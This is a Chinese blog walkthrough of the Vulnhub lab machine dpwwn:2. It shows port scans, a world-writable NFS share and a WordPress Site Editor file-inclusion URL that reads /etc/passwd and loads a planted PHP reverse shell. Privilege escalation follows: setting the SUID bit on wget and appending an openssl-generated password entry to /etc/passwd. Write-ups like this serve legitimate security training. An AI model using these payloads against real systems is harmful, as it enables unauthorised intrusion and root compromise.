zoukankan      html  css  js  c++  java
  • dpwwn:2 Vulnhub Walkthrough

    此镜像配置了静态IP地址:10.10.10.10,需要调整下网络

    主机层扫描:

    ╰─ nmap -p1-65535 -sV -A 10.10.10.10 

    80/tcp    open  http      Apache httpd 2.4.38 ((Ubuntu))

    443/tcp   open  ssl/https Apache/2.4.38 (Ubuntu)

    2049/tcp open nfs_acl 3 (RPC #100227)
    34153/tcp open nlockmgr 1-4 (RPC #100021)
    46643/tcp open mountd 1-3 (RPC #100005)
    49509/tcp open mountd 1-3 (RPC #100005)
    50875/tcp open mountd 1-3 (RPC #100005)

    ╰─ showmount -e 10.10.10.10
    Export list for 10.10.10.10:
    /home/dpwwn02 (everyone)

    ╰─ ls -laRt
    .:
    总用量 8
    drwxr-xr-x 25 root root 4096 8月 14 17:59 ..
    drwxr-xr-x 2 nobody nogroup 4096 8月 8 15:46 .

    ╰─ dirb http://10.10.10.10/

    ---- Scanning URL: http://10.10.10.10/ ----
    + http://10.10.10.10/index.html (CODE:403|SIZE:219)
    + http://10.10.10.10/index.php (CODE:200|SIZE:167)
    + http://10.10.10.10/server-status (CODE:403|SIZE:222)
    ==> DIRECTORY: http://10.10.10.10/wordpress/

    ╰─ wpscan --url http://10.10.10.10/wordpress/

    ** Proof of Concept **
    http://<host>/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

    http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

    结合刚才的NFS 文件权限,尝试包含文件进来

    http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/php-reverse.php

    进行提权操作

    find / -perm -u=s -type f 2>/dev/null

    which wget

    ls -lha /usr/bin/wget

    find /home -exec chmod u+s /usr/bin/wget ;

    ls -lh /usr/bin/wget
    -rwsr-xr-x 1 root root 460K Apr 9 13:35 /usr/bin/wget

    本地下载passwd文件

    http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

    ╰─ openssl passwd -1 -salt hack pass123
    $1$hack$22.CgYt2uMolqeatCk9ih/

    追加到passwd文件末尾。

    完!

  • 相关阅读:
    【校招面试 之 C/C++】第1题 为什么优先使用构造函数的初始化列表
    Linux平台ORACLE INSTANT客户端安装
    ORACLE数据库链接
    ORACLE用户管理
    【转】软件开发工具介绍之 6.Web开发工具
    【转】三大UML建模工具Visio、Rational Rose、PowerDesign的区别
    ORACLE数据库查看执行计划
    数据分析方法
    ORACLE对象大小写问题
    计算机改名引发的ORA
  • 原文地址:https://www.cnblogs.com/hack404/p/11384532.html
Copyright © 2011-2022 走看看